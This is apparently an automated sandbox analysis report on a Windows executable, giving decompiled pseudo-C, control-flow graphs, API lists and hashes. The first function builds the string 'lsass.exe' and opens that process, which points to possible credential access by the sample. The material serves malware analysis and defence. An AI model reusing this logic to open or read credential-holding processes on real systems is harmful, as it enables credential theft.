                                                                                                                                                                                        				intOrPtr _t74;
                                                                                                                                                                                        				intOrPtr _t80;
                                                                                                                                                                                        				void* _t91;
                                                                                                                                                                                        				intOrPtr _t112;
                                                                                                                                                                                        				intOrPtr* _t116;
                                                                                                                                                                                        				intOrPtr* _t121;
                                                                                                                                                                                        				short* _t123;
                                                                                                                                                                                        				intOrPtr _t127;
                                                                                                                                                                                        				long long _t128;
                                                                                                                                                                                        				long long _t129;
                                                                                                                                                                                        				intOrPtr _t131;
                                                                                                                                                                                        				void* _t153;
                                                                                                                                                                                        				long long _t156;
                                                                                                                                                                                        				intOrPtr* _t157;
                                                                                                                                                                                        				void* _t158;
                                                                                                                                                                                        				intOrPtr* _t161;
                                                                                                                                                                                        				void* _t163;
                                                                                                                                                                                        				void* _t168;
                                                                                                                                                                                        				void* _t169;
                                                                                                                                                                                        				void* _t170;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t168 = __r9;
                                                                                                                                                                                        				_v104 = 0x73006c;
                                                                                                                                                                                        				asm("sbb eax, eax");
                                                                                                                                                                                        				r13d = 0;
                                                                                                                                                                                        				r15d = 0;
                                                                                                                                                                                        				_v100 = 0x730061;
                                                                                                                                                                                        				_v96 = 0x2e0073;
                                                                                                                                                                                        				_v92 = 0x780065;
                                                                                                                                                                                        				_t91 =  *0xcef30688 - _t129; // 0x0
                                                                                                                                                                                        				_v88 = 0x65;
                                                                                                                                                                                        				_a24 = (__eax & 0xfffff400) + 0x00001000 | 0x00000010;
                                                                                                                                                                                        				if (_t91 != 0) goto 0xcef235eb;
                                                                                                                                                                                        				_t121 =  *0xcef30920; // 0x7ff7cef2c018
                                                                                                                                                                                        				_a8 = 0xc0000225;
                                                                                                                                                                                        				_t48 =  *_t121(); // executed
                                                                                                                                                                                        				if (_t48 < 0) goto 0xcef235eb;
                                                                                                                                                                                        				_t131 =  *0xcef306a0; // 0x0
                                                                                                                                                                                        				if (_t131 == 0) goto 0xcef23325;
                                                                                                                                                                                        				_v136 = _t129;
                                                                                                                                                                                        				_t9 = _t129 + 1; // 0x1
                                                                                                                                                                                        				r8d = _t9;
                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                        				_v144 = 0;
                                                                                                                                                                                        				_t11 = _t129 + 2; // 0x2
                                                                                                                                                                                        				r12d = _t11;
                                                                                                                                                                                        				_v152 = 3;
                                                                                                                                                                                        				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                                                                                                                                                                                        				goto 0xcef233ac;
                                                                                                                                                                                        				_v80 =  &_v120;
                                                                                                                                                                                        				_t123 =  &_a16;
                                                                                                                                                                                        				r12d = 1;
                                                                                                                                                                                        				_v72 = _t123;
                                                                                                                                                                                        				_v64 = 0;
                                                                                                                                                                                        				RtlInitUnicodeString(??, ??);
                                                                                                                                                                                        				_a32 = _t129;
                                                                                                                                                                                        				_t50 = E00007FF77FF7CEF21864(_t170 + 4, _t129,  &_a32, _t153, _t158, _t163); // executed
                                                                                                                                                                                        				if (_t50 < 0) goto 0xcef23578;
                                                                                                                                                                                        				goto 0xcef2337e;
                                                                                                                                                                                        				if ( *_a32 == 0) goto 0xcef2338b;
                                                                                                                                                                                        				if (E00007FF77FF7CEF21920(_t129, _a32 + _t123,  &_v80) != 0) goto 0xcef23372;
                                                                                                                                                                                        				LocalFree(??);
                                                                                                                                                                                        				if (_v64 == 0) goto 0xcef23578;
                                                                                                                                                                                        				r8d = _a16;
                                                                                                                                                                                        				OpenProcess(??, ??, ??);
                                                                                                                                                                                        				if (_t123 == 0) goto 0xcef23578;
                                                                                                                                                                                        				if (_t123 == 0xffffffff) goto 0xcef23578;
                                                                                                                                                                                        				if (E00007FF77FF7CEF21000(r12d, _t129, _t123, _a32 + _t123, 0xcef30688, _t163, 0xcef30688) == 0) goto 0xcef23578;
                                                                                                                                                                                        				_t156 =  *0xcef30688; // 0x0
                                                                                                                                                                                        				if (r12d != 2) goto 0xcef23463;
                                                                                                                                                                                        				E00007FF77FF7CEF21624(_t170 + 5,  *((intOrPtr*)( *((intOrPtr*)(_t156 + 8)))), 0xcef30688);
                                                                                                                                                                                        				if (_t123 == 0) goto 0xcef23448;
                                                                                                                                                                                        				_t72 =  *((intOrPtr*)(_t123 + 8));
                                                                                                                                                                                        				r9d =  *0xcef30acc; // 0xa
                                                                                                                                                                                        				 *0xcef30690 = _t72;
                                                                                                                                                                                        				 *0xcef30694 =  *((intOrPtr*)(_t123 + 0xc));
                                                                                                                                                                                        				r8d =  *((intOrPtr*)(_t123 + 0x10));
                                                                                                                                                                                        				 *0xcef30698 = r8d;
                                                                                                                                                                                        				if (_t72 == r9d) goto 0xcef2343e;
                                                                                                                                                                                        				if (r9d - 6 < 0) goto 0xcef2357f;
                                                                                                                                                                                        				if (_t72 - 6 < 0) goto 0xcef2357f;
                                                                                                                                                                                        				r15b =  *_t123 != 9;
                                                                                                                                                                                        				goto 0xcef23489;
                                                                                                                                                                                        				r8d =  *0xcef30698; // 0x2ee
                                                                                                                                                                                        				r15d = 1;
                                                                                                                                                                                        				goto 0xcef23489;
                                                                                                                                                                                        				_t74 =  *0xcef30acc; // 0xa
                                                                                                                                                                                        				_t80 =  *0xcef30ac8; // 0x0
                                                                                                                                                                                        				r8d =  *0xcef30ad0; // 0x2ee
                                                                                                                                                                                        				 *0xcef30690 = _t74;
                                                                                                                                                                                        				 *0xcef30694 = _t80;
                                                                                                                                                                                        				 *0xcef30698 = r8d;
                                                                                                                                                                                        				if (r15d != 0) goto 0xcef2357f;
                                                                                                                                                                                        				 *0xcef30a30 = 0 | r8d - 0x00001f40 >= 0x00000000;
                                                                                                                                                                                        				if (_t74 - 6 >= 0) goto 0xcef234b4;
                                                                                                                                                                                        				 *0xcef309d0 = 0;
                                                                                                                                                                                        				if (_t80 - 2 >= 0) goto 0xcef234be;
                                                                                                                                                                                        				 *0xcef309d0 = 1;
                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                        				_t59 = E00007FF77FF7CEF2196C(_t80, _t156, E00007FF77FF7CEF23600, 0xcef30688, _t168); // executed
                                                                                                                                                                                        				if (_t59 < 0) goto 0xcef23578;
                                                                                                                                                                                        				_t112 =  *0xcef2f060; // 0x1
                                                                                                                                                                                        				if (_t112 == 0) goto 0xcef23578;
                                                                                                                                                                                        				asm("movaps xmm0, [0xbb55]");
                                                                                                                                                                                        				asm("movaps xmm1, [0xbb54]");
                                                                                                                                                                                        				_v136 = _t129;
                                                                                                                                                                                        				asm("movups [0xd58a], xmm0");
                                                                                                                                                                                        				asm("movsd xmm0, [0xbb42]");
                                                                                                                                                                                        				asm("movups [0xd58b], xmm1");
                                                                                                                                                                                        				_t125 =  <  ? _t129 : 0xcef306b0;
                                                                                                                                                                                        				r9d = 8;
                                                                                                                                                                                        				asm("movsd [0xd582], xmm0");
                                                                                                                                                                                        				_v144 =  <  ? _t129 : 0xcef306b0;
                                                                                                                                                                                        				_v152 = 0xcef306a8;
                                                                                                                                                                                        				if (E00007FF77FF7CEF23DA8(_t129, 0xcef30688, 0xcef2f040, _t156, 0xcef30688, 0xcef2f0d0, _t168, _t169) == 0) goto 0xcef23578;
                                                                                                                                                                                        				_t127 =  *0xcef30920; // 0x7ff7cef2c018
                                                                                                                                                                                        				_t61 =  *((intOrPtr*)(_t127 + 0x10))();
                                                                                                                                                                                        				_a8 = _t61;
                                                                                                                                                                                        				if (_t61 >= 0) goto 0xcef235eb;
                                                                                                                                                                                        				_t157 =  *0xcef30688; // 0x0
                                                                                                                                                                                        				_t116 = _t157;
                                                                                                                                                                                        				if (_t116 == 0) goto 0xcef235d8;
                                                                                                                                                                                        				if (_t116 == 0) goto 0xcef235c2;
                                                                                                                                                                                        				if (_t116 == 0) goto 0xcef23599;
                                                                                                                                                                                        				if (_t116 == 0) goto 0xcef235c2;
                                                                                                                                                                                        				if ( *_t157 - 0xffffffffffffffff != 3) goto 0xcef235cc;
                                                                                                                                                                                        				goto 0xcef235c2;
                                                                                                                                                                                        				_t128 =  *((intOrPtr*)(_t157 + 8));
                                                                                                                                                                                        				if (_t128 == 0) goto 0xcef235cc;
                                                                                                                                                                                        				_t161 =  *_t128;
                                                                                                                                                                                        				if ( *((intOrPtr*)(_t161 + 8)) == 0) goto 0xcef235b4;
                                                                                                                                                                                        				UnmapViewOfFile(??);
                                                                                                                                                                                        				if ( *_t161 == _t129) goto 0xcef235c2;
                                                                                                                                                                                        				CloseHandle(??);
                                                                                                                                                                                        				LocalFree(??);
                                                                                                                                                                                        				LocalFree(??);
                                                                                                                                                                                        				 *0xcef30688 = _t128; // executed
                                                                                                                                                                                        				FindCloseChangeNotification(??); // executed
                                                                                                                                                                                        				return _a8;
                                                                                                                                                                                        			}













































                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FreeLocal$CloseFile$ChangeCreateFindHandleInitNotificationOpenProcessStringUnicodeUnmapView
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 34978191-0
                                                                                                                                                                                        • Opcode ID: cc8829089956d63626426c18dc2d50d9a0f7f225df45c6989eba5b351c94c693
                                                                                                                                                                                        • Instruction ID: ca74c4832288f881fe86a5a6d222fc335c7cd8e3a6660a637c4d511eedfe12d5
                                                                                                                                                                                        • Opcode Fuzzy Hash: cc8829089956d63626426c18dc2d50d9a0f7f225df45c6989eba5b351c94c693
                                                                                                                                                                                        • Instruction Fuzzy Hash: A7A14072E0AA438AFB94EF21E841678B7A1BF847A4F944136C90D67B94DF7CE445C720
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 395 7ff7cef266bc-7ff7cef266fb GetStartupInfoW call 7ff7cef27520 398 7ff7cef266fd-7ff7cef26700 395->398 399 7ff7cef26705-7ff7cef2671d 395->399 400 7ff7cef26970-7ff7cef2698d 398->400 401 7ff7cef2671f 399->401 402 7ff7cef26764-7ff7cef2676a 399->402 403 7ff7cef26723-7ff7cef2675c 401->403 404 7ff7cef26770-7ff7cef26778 402->404 405 7ff7cef268a4-7ff7cef268a7 402->405 403->403 408 7ff7cef2675e 403->408 404->405 406 7ff7cef2677e-7ff7cef26794 404->406 407 7ff7cef268aa-7ff7cef268b6 405->407 409 7ff7cef2679a 406->409 410 7ff7cef26821-7ff7cef26826 406->410 411 7ff7cef268b8-7ff7cef268bd 407->411 412 7ff7cef268c9-7ff7cef268f2 GetStdHandle 407->412 408->402 413 7ff7cef267a1-7ff7cef267b1 call 7ff7cef27520 409->413 410->405 417 7ff7cef26828-7ff7cef2682d 410->417 411->412 414 7ff7cef268bf-7ff7cef268c4 411->414 415 7ff7cef26941-7ff7cef26946 412->415 416 7ff7cef268f4-7ff7cef268f7 412->416 428 7ff7cef2681b 413->428 429 7ff7cef267b3-7ff7cef267ce 413->429 419 7ff7cef2694e-7ff7cef2695c 414->419 415->419 416->415 420 7ff7cef268f9-7ff7cef26904 GetFileType 416->420 421 7ff7cef26897-7ff7cef268a2 417->421 422 7ff7cef2682f-7ff7cef26834 417->422 419->407 424 7ff7cef26962-7ff7cef2696e SetHandleCount 419->424 420->415 425 7ff7cef26906-7ff7cef26910 420->425 421->405 421->417 422->421 426 7ff7cef26836-7ff7cef2683b 422->426 424->400 430 7ff7cef26919-7ff7cef2691c 425->430 431 7ff7cef26912-7ff7cef26917 425->431 426->421 427 7ff7cef2683d-7ff7cef26842 426->427 432 7ff7cef26852-7ff7cef2688e InitializeCriticalSectionAndSpinCount 427->432 433 7ff7cef26844-7ff7cef26850 GetFileType 427->433 428->410 434 7ff7cef267d0 429->434 435 7ff7cef26811-7ff7cef26817 429->435 436 7ff7cef26923-7ff7cef26935 InitializeCriticalSectionAndSpinCount 430->436 437 7ff7cef2691e 430->437 431->436 432->398 439 7ff7cef26894 432->439 
433->421 433->432 440 7ff7cef267d4-7ff7cef26809 434->440 435->413 441 7ff7cef26819 435->441 436->398 438 7ff7cef2693b-7ff7cef2693f 436->438 437->436 438->419 439->421 440->440 442 7ff7cef2680b 440->442 441->410 442->435
                                                                                                                                                                                        C-Code - Quality: 38%
                                                                                                                                                                                        			E00007FF77FF7CEF266BC(intOrPtr __rax, long long __rbx, void* __rdx, long long __rdi) {
                                                                                                                                                                                        				signed char _t83;
                                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                                        				intOrPtr _t90;
                                                                                                                                                                                        				intOrPtr _t93;
                                                                                                                                                                                        				void* _t95;
                                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                                        				intOrPtr _t101;
                                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                                        				intOrPtr _t106;
                                                                                                                                                                                        				intOrPtr _t138;
                                                                                                                                                                                        				intOrPtr _t140;
                                                                                                                                                                                        				void* _t142;
                                                                                                                                                                                        				long long _t147;
                                                                                                                                                                                        				struct _STARTUPINFOW* _t149;
                                                                                                                                                                                        				intOrPtr _t163;
                                                                                                                                                                                        				void* _t164;
                                                                                                                                                                                        				void* _t166;
                                                                                                                                                                                        				intOrPtr _t171;
                                                                                                                                                                                        				void* _t173;
                                                                                                                                                                                        				long long _t174;
                                                                                                                                                                                        				long long* _t177;
                                                                                                                                                                                        				void* _t180;
                                                                                                                                                                                        				void* _t181;
                                                                                                                                                                                        				void* _t184;
                                                                                                                                                                                        				intOrPtr* _t186;
                                                                                                                                                                                        				void* _t189;
                                                                                                                                                                                        				signed char* _t190;
                                                                                                                                                                                        				struct _STARTUPINFOW* _t193;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t162 = __rdx;
                                                                                                                                                                                        				_t148 = __rbx;
                                                                                                                                                                                        				_t138 = __rax;
                                                                                                                                                                                        				 *((long long*)(_t180 + 8)) = __rbx;
                                                                                                                                                                                        				 *((long long*)(_t180 + 0x10)) = _t174;
                                                                                                                                                                                        				 *((long long*)(_t180 + 0x18)) = __rdi;
                                                                                                                                                                                        				_t181 = _t180 - 0x90;
                                                                                                                                                                                        				GetStartupInfoW(_t193);
                                                                                                                                                                                        				_t5 = _t162 - 0x38; // 0x20
                                                                                                                                                                                        				_t106 = _t5;
                                                                                                                                                                                        				E00007FF77FF7CEF27520(__rbx, _t181 + 0x20, __rdx, __rdi, _t173, _t174, _t189, _t184);
                                                                                                                                                                                        				r14d = 0;
                                                                                                                                                                                        				_t163 = _t138;
                                                                                                                                                                                        				if (_t138 != 0) goto 0xcef26705;
                                                                                                                                                                                        				goto 0xcef26970;
                                                                                                                                                                                        				 *0xcef306e0 = _t138;
                                                                                                                                                                                        				 *0xcef306c8 = _t106;
                                                                                                                                                                                        				if (_t163 - _t138 + 0xb00 >= 0) goto 0xcef26764;
                                                                                                                                                                                        				_t164 = _t163 + 9;
                                                                                                                                                                                        				 *(_t164 - 9) =  *(_t164 - 9) | 0xffffffff;
                                                                                                                                                                                        				 *((short*)(_t164 - 1)) = 0xa00;
                                                                                                                                                                                        				 *(_t164 + 3) = r14d;
                                                                                                                                                                                        				 *((short*)(_t164 + 0x2f)) = 0xa00;
                                                                                                                                                                                        				 *((char*)(_t164 + 0x31)) = 0xa;
                                                                                                                                                                                        				 *(_t164 + 0x47) = r14d;
                                                                                                                                                                                        				 *((intOrPtr*)(_t164 + 0x43)) = r14b;
                                                                                                                                                                                        				_t140 =  *0xcef306e0; // 0x2150b10
                                                                                                                                                                                        				_t14 = _t164 + 0x58 - 9; // -106
                                                                                                                                                                                        				if (_t14 - _t140 + 0xb00 < 0) goto 0xcef26723;
                                                                                                                                                                                        				_t93 =  *0xcef306c8; // 0x20
                                                                                                                                                                                        				if ( *((intOrPtr*)(_t181 + 0x62)) == r14w) goto 0xcef268a4;
                                                                                                                                                                                        				_t142 =  *((intOrPtr*)(_t181 + 0x68));
                                                                                                                                                                                        				if (_t142 == 0) goto 0xcef268a4;
                                                                                                                                                                                        				_t190 = _t142 + 4;
                                                                                                                                                                                        				_t186 =  *_t142 + _t190;
                                                                                                                                                                                        				_t89 =  <  ?  *_t142 : 0x800;
                                                                                                                                                                                        				if (_t93 - 0x800 >= 0) goto 0xcef26821;
                                                                                                                                                                                        				E00007FF77FF7CEF27520(_t148, _t174, _t164 + 0x58, 0xcef306e8, _t173, _t174);
                                                                                                                                                                                        				if (_t142 == 0) goto 0xcef2681b;
                                                                                                                                                                                        				_t99 =  *0xcef306c8; // 0x20
                                                                                                                                                                                        				_t18 = _t142 + 0xb00; // 0xb00
                                                                                                                                                                                        				 *0xcef306e8 = _t142;
                                                                                                                                                                                        				 *0xcef306c8 = _t99 + _t106;
                                                                                                                                                                                        				if (_t142 - _t18 >= 0) goto 0xcef26811;
                                                                                                                                                                                        				_t19 = _t142 + 9; // 0x9
                                                                                                                                                                                        				_t166 = _t19;
                                                                                                                                                                                        				 *(_t166 - 9) =  *(_t166 - 9) | 0xffffffff;
                                                                                                                                                                                        				 *(_t166 + 0x2f) =  *(_t166 + 0x2f) & 0x00000080;
                                                                                                                                                                                        				 *((short*)(_t166 - 1)) = 0xa00;
                                                                                                                                                                                        				 *(_t166 + 3) = r14d;
                                                                                                                                                                                        				 *((short*)(_t166 + 0x30)) = 0xa0a;
                                                                                                                                                                                        				 *(_t166 + 0x47) = r14d;
                                                                                                                                                                                        				 *((intOrPtr*)(_t166 + 0x43)) = r14b;
                                                                                                                                                                                        				_t29 = _t166 + 0x58 - 9; // -88
                                                                                                                                                                                        				if (_t29 -  *0xcef306e8 + 0xb00 < 0) goto 0xcef267d4;
                                                                                                                                                                                        				_t101 =  *0xcef306c8; // 0x20
                                                                                                                                                                                        				_t118 = _t101 - ( <  ?  *_t142 : 0x800);
                                                                                                                                                                                        				if (_t101 - ( <  ?  *_t142 : 0x800) < 0) goto 0xcef267a1;
                                                                                                                                                                                        				goto 0xcef26821;
                                                                                                                                                                                        				_t90 =  *0xcef306c8; // 0x20
                                                                                                                                                                                        				_t104 = r14d;
                                                                                                                                                                                        				if (_t90 <= 0) goto 0xcef268a4;
                                                                                                                                                                                        				if ( *_t186 == 0xffffffff) goto 0xcef26897;
                                                                                                                                                                                        				if ( *_t186 == 0xfffffffe) goto 0xcef26897;
                                                                                                                                                                                        				if (( *_t190 & 0x00000001) == 0) goto 0xcef26897;
                                                                                                                                                                                        				if (( *_t190 & 0x00000008) != 0) goto 0xcef26852;
                                                                                                                                                                                        				if (GetFileType(??) == 0) goto 0xcef26897;
                                                                                                                                                                                        				_t177 = _t104 * 0x58 +  *((intOrPtr*)(0xcef306e0 + (_t104 >> 5) * 8));
                                                                                                                                                                                        				_t147 =  *_t186;
                                                                                                                                                                                        				 *_t177 = _t147;
                                                                                                                                                                                        				 *((char*)(_t177 + 8)) =  *_t190;
                                                                                                                                                                                        				if (InitializeCriticalSectionAndSpinCount(??, ??) == 0) goto 0xcef266fd;
                                                                                                                                                                                        				 *((intOrPtr*)(_t177 + 0xc)) =  *((intOrPtr*)(_t177 + 0xc)) + 1;
                                                                                                                                                                                        				if (_t104 + 1 - _t90 < 0) goto 0xcef26828;
                                                                                                                                                                                        				r12d = r14d;
                                                                                                                                                                                        				_t149 = _t193;
                                                                                                                                                                                        				_t171 =  *0xcef306e0; // 0x2150b10
                                                                                                                                                                                        				if ( *((long long*)(_t149 + _t171)) == 0xffffffff) goto 0xcef268c9;
                                                                                                                                                                                        				if ( *((long long*)(_t149 + _t171)) == 0xfffffffe) goto 0xcef268c9;
                                                                                                                                                                                        				 *(_t149 + _t171 + 8) =  *(_t149 + _t171 + 8) | 0x00000080;
                                                                                                                                                                                        				goto 0xcef2694e;
                                                                                                                                                                                        				 *(_t149 + _t171 + 8) = 0x81;
                                                                                                                                                                                        				asm("sbb ecx, ecx");
                                                                                                                                                                                        				_t95 =  ==  ? 0xfffffff6 : _t93 + 0xfffffff5;
                                                                                                                                                                                        				GetStdHandle(??);
                                                                                                                                                                                        				if (_t147 == 0xffffffff) goto 0xcef26941;
                                                                                                                                                                                        				if (_t147 == 0) goto 0xcef26941;
                                                                                                                                                                                        				_t83 = GetFileType(??); // executed
                                                                                                                                                                                        				if (_t83 == 0) goto 0xcef26941;
                                                                                                                                                                                        				_t84 = _t83 & 0x000000ff;
                                                                                                                                                                                        				 *((long long*)(_t149 + _t171)) = _t147;
                                                                                                                                                                                        				if (_t84 != 2) goto 0xcef26919;
                                                                                                                                                                                        				 *(_t149 + _t171 + 8) =  *(_t149 + _t171 + 8) | 0x00000040;
                                                                                                                                                                                        				goto 0xcef26923;
                                                                                                                                                                                        				if (_t84 != 3) goto 0xcef26923;
                                                                                                                                                                                        				 *(_t149 + _t171 + 8) =  *(_t149 + _t171 + 8) | 0x00000008;
                                                                                                                                                                                        				if (InitializeCriticalSectionAndSpinCount(??, ??) == 0) goto 0xcef266fd;
                                                                                                                                                                                        				 *((intOrPtr*)(_t149 + _t171 + 0xc)) =  *((intOrPtr*)(_t149 + _t171 + 0xc)) + 1;
                                                                                                                                                                                        				goto 0xcef2694e;
                                                                                                                                                                                        				 *(_t149 + _t171 + 8) =  *(_t149 + _t171 + 8) | 0x00000040;
                                                                                                                                                                                        				 *((long long*)(_t149 + _t171)) = 0xfffffffe;
                                                                                                                                                                                        				r12d = r12d + 1;
                                                                                                                                                                                        				if (_t149 + 0x58 - 0x108 < 0) goto 0xcef268aa;
                                                                                                                                                                                        				SetHandleCount(??);
                                                                                                                                                                                        				return 0;
                                                                                                                                                                                        			}































                                                                                                                                                                                        0x7ff7cef26794
                                                                                                                                                                                        0x7ff7cef267a9
                                                                                                                                                                                        0x7ff7cef267b1
                                                                                                                                                                                        0x7ff7cef267b3
                                                                                                                                                                                        0x7ff7cef267b9
                                                                                                                                                                                        0x7ff7cef267c0
                                                                                                                                                                                        0x7ff7cef267c5
                                                                                                                                                                                        0x7ff7cef267ce
                                                                                                                                                                                        0x7ff7cef267d0
                                                                                                                                                                                        0x7ff7cef267d0
                                                                                                                                                                                        0x7ff7cef267d4
                                                                                                                                                                                        0x7ff7cef267d9
                                                                                                                                                                                        0x7ff7cef267dd
                                                                                                                                                                                        0x7ff7cef267e3
                                                                                                                                                                                        0x7ff7cef267e7
                                                                                                                                                                                        0x7ff7cef267ed
                                                                                                                                                                                        0x7ff7cef267f1
                                                                                                                                                                                        0x7ff7cef267fc
                                                                                                                                                                                        0x7ff7cef26809
                                                                                                                                                                                        0x7ff7cef2680b
                                                                                                                                                                                        0x7ff7cef26815
                                                                                                                                                                                        0x7ff7cef26817
                                                                                                                                                                                        0x7ff7cef26819
                                                                                                                                                                                        0x7ff7cef2681b
                                                                                                                                                                                        0x7ff7cef26821
                                                                                                                                                                                        0x7ff7cef26826
                                                                                                                                                                                        0x7ff7cef2682d
                                                                                                                                                                                        0x7ff7cef26834
                                                                                                                                                                                        0x7ff7cef2683b
                                                                                                                                                                                        0x7ff7cef26842
                                                                                                                                                                                        0x7ff7cef26850
                                                                                                                                                                                        0x7ff7cef2686f
                                                                                                                                                                                        0x7ff7cef26873
                                                                                                                                                                                        0x7ff7cef26877
                                                                                                                                                                                        0x7ff7cef26883
                                                                                                                                                                                        0x7ff7cef2688e
                                                                                                                                                                                        0x7ff7cef26894
                                                                                                                                                                                        0x7ff7cef268a2
                                                                                                                                                                                        0x7ff7cef268a4
                                                                                                                                                                                        0x7ff7cef268a7
                                                                                                                                                                                        0x7ff7cef268aa
                                                                                                                                                                                        0x7ff7cef268b6
                                                                                                                                                                                        0x7ff7cef268bd
                                                                                                                                                                                        0x7ff7cef268bf
                                                                                                                                                                                        0x7ff7cef268c4
                                                                                                                                                                                        0x7ff7cef268ce
                                                                                                                                                                                        0x7ff7cef268da
                                                                                                                                                                                        0x7ff7cef268e2
                                                                                                                                                                                        0x7ff7cef268e5
                                                                                                                                                                                        0x7ff7cef268f2
                                                                                                                                                                                        0x7ff7cef268f7
                                                                                                                                                                                        0x7ff7cef268fc
                                                                                                                                                                                        0x7ff7cef26904
                                                                                                                                                                                        0x7ff7cef26906
                                                                                                                                                                                        0x7ff7cef26909
                                                                                                                                                                                        0x7ff7cef26910
                                                                                                                                                                                        0x7ff7cef26912
                                                                                                                                                                                        0x7ff7cef26917
                                                                                                                                                                                        0x7ff7cef2691c
                                                                                                                                                                                        0x7ff7cef2691e
                                                                                                                                                                                        0x7ff7cef26935
                                                                                                                                                                                        0x7ff7cef2693b
                                                                                                                                                                                        0x7ff7cef2693f
                                                                                                                                                                                        0x7ff7cef26941
                                                                                                                                                                                        0x7ff7cef26946
                                                                                                                                                                                        0x7ff7cef26952
                                                                                                                                                                                        0x7ff7cef2695c
                                                                                                                                                                                        0x7ff7cef26968
                                                                                                                                                                                        0x7ff7cef2698d

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3473179607-0
                                                                                                                                                                                        • Opcode ID: 2b97fe4d96a52dfacd4053596027578da95e05ddabbf4bf779a920701995bae6
                                                                                                                                                                                        • Instruction ID: 65d27ed1703dd0b998a08948a98c6b0c356b31c75f0e2d98e2a9a7b476a901f4
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b97fe4d96a52dfacd4053596027578da95e05ddabbf4bf779a920701995bae6
                                                                                                                                                                                        • Instruction Fuzzy Hash: DC819C61A09B8286EB94AF24944436CB7A0FF44B74F958335CA7E222D6EF3CE555D320
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • _lock.LIBCMT ref: 00007FF7CEF25A0D
                                                                                                                                                                                          • Part of subcall function 00007FF7CEF2741C: _amsg_exit.LIBCMT ref: 00007FF7CEF27446
                                                                                                                                                                                        • RtlDecodePointer.NTDLL(?,?,?,?,?,?,00000000,00007FF7CEF25BD1,?,?,00000000,00007FF7CEF2744B), ref: 00007FF7CEF25A40
                                                                                                                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7CEF25BD1,?,?,00000000,00007FF7CEF2744B), ref: 00007FF7CEF25A5E
                                                                                                                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7CEF25BD1,?,?,00000000,00007FF7CEF2744B), ref: 00007FF7CEF25A9E
                                                                                                                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7CEF25BD1,?,?,00000000,00007FF7CEF2744B), ref: 00007FF7CEF25AB8
                                                                                                                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7CEF25BD1,?,?,00000000,00007FF7CEF2744B), ref: 00007FF7CEF25AC8
                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00007FF7CEF25B54
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: DecodePointer$ExitProcess_amsg_exit_lock
                                                                                                                                                                                        • String ID:
